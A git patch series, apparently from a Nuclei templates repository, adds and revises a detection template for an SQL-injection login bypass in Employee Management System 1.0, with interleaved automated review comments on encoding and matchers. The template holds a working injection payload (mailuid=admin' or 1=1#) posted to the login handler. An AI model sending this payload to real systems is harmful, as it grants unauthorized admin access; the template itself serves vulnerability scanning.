From 2fd7baf1bfc756c69ea3c3a3cd4e08f04460de43 Mon Sep 17 00:00:00 2001
From: Arafat Ansari <54571841+arafatansari@users.noreply.github.com>
Date: Thu, 21 Jul 2022 12:39:06 +0530
Subject: [PATCH 1/3] Create ems-sqli.yaml

---
 vulnerabilities/other/ems-sqli.yaml | 35 +++++++++++++++++++++++++++++
 1 file changed, 35 insertions(+)
 create mode 100644 vulnerabilities/other/ems-sqli.yaml

diff --git a/vulnerabilities/other/ems-sqli.yaml b/vulnerabilities/other/ems-sqli.yaml
new file mode 100644
index 0000000000..edbcbe17d5
--- /dev/null
+++ b/vulnerabilities/other/ems-sqli.yaml
@@ -0,0 +1,35 @@
+id: ems-sqli
+
+info:
+  name: Employee Management System 1.0 - SQLi Authentication Bypass
+  author: arafatansari
+  severity: high
+  description: |
+    Employee Management System Login page can be bypassed with a simple SQLi to the username parameter.
+  reference:
+    - https://www.exploit-db.com/exploits/48882
+  tags: sqli,bypass,cms
+
+requests:
+  - raw:
+      - |
+        POST /process/aprocess.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        mailuid=user%27+or+1%3D1%23&pwd=nuclei&login-submit=Login
+
+    redirects: true
+    max-redirects: 2
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'window.start_load'
+          - 'Admin Panel'
+          - 'Employee Management System'
+
+      - type: status
+        status:
+          - 200

From b78a6b9a85afb7948139592e99e69ab36055db98 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Sat, 30 Jul 2022 12:16:47 +0530
Subject: [PATCH 2/3] Update ems-sqli.yaml

---
 vulnerabilities/other/ems-sqli.yaml | 10 +++++++---
 1 file changed, 7 insertions(+), 3 deletions(-)

diff --git a/vulnerabilities/other/ems-sqli.yaml b/vulnerabilities/other/ems-sqli.yaml
index edbcbe17d5..21b31e8ca3 100644
--- a/vulnerabilities/other/ems-sqli.yaml
+++ b/vulnerabilities/other/ems-sqli.yaml
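Review bot: The `description` in the new `info` block says the login page "can be bypassed with a simple SQLi" but does not say what the payload does or what an operator obtains, which is the first thing a triager reading a high-severity result needs. The request in this hunk posts a URL-encoded `mailuid=user' or 1=1#` to `/process/aprocess.php`, so the description could read: `An unauthenticated attacker can POST a crafted mailuid value to /process/aprocess.php; the injected ' or 1=1# appears to short-circuit the credential check and authenticates the request without a valid password.` It is also worth noting in the description that `#` is a MySQL-style line comment, so the check as written presumably only confirms the bypass on MySQL/MariaDB-backed deployments. Stating this up front avoids a false negative being read as "not vulnerable" on a differently backed install.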
@@ -8,7 +8,10 @@ info:
     Employee Management System Login page can be bypassed with a simple SQLi to the username parameter.
   reference:
     - https://www.exploit-db.com/exploits/48882
-  tags: sqli,bypass,cms
+    - https://www.sourcecodester.com/sites/default/files/download/razormist/employee-management-system.zip
+  metadata:
+    verified: true
+  tags: ems,sqli,cms,auth-bypass
 
 requests:
   - raw:
@@ -17,7 +20,7 @@ requests:
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
 
-        mailuid=user%27+or+1%3D1%23&pwd=nuclei&login-submit=Login
+        mailuid=admin' or 1=1#&pwd=nuclei&login-submit=Login
 
     redirects: true
     max-redirects: 2
@@ -26,9 +29,10 @@ requests:
       - type: word
         part: body
         words:
-          - 'window.start_load'
           - 'Admin Panel'
+          - 'Log Out'
           - 'Employee Management System'
+          condition: and
 
       - type: status
         status:
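Review bot: The replacement body line in the second hunk, `mailuid=admin' or 1=1#&pwd=nuclei&login-submit=Login`, is no longer valid `application/x-www-form-urlencoded` content: the apostrophe, the spaces and the `#` are sent raw, whereas the removed line percent-encoded them (`%27`, `+`, `%23`). PHP's form parser is lenient so the template presumably still works against the reference target, but an intermediary or a stricter parser may normalise or reject the body, and a bare `#` in a raw request block is easy to misread as a comment when the template is edited later. I would keep the encoded form, `mailuid=admin%27+or+1%3D1%23&pwd=nuclei&login-submit=Login`, which decodes to exactly the same string server-side. The raw request block and its `Content-Type` header begin above this hunk.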
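Review bot: The added `condition: and` in the third hunk correctly stops the word matcher from firing on any single generic string, but all three remaining words are page-branding strings, so a target whose login page happens to carry the same admin layout would presumably still match on a 200 after the redirect. A negative word matcher on something only the login form has would separate a genuine post-login page from an unchanged login page; the `login-submit` field name the template itself posts suggests one candidate, to be confirmed against the login HTML. The enclosing `matchers` list and `matchers-condition: and` start above this hunk, and the new matcher would go after the `status` matcher's `- 200` line below it.

```yaml
      - type: word
        part: body
        negative: true
        words:
          - 'login-submit'
```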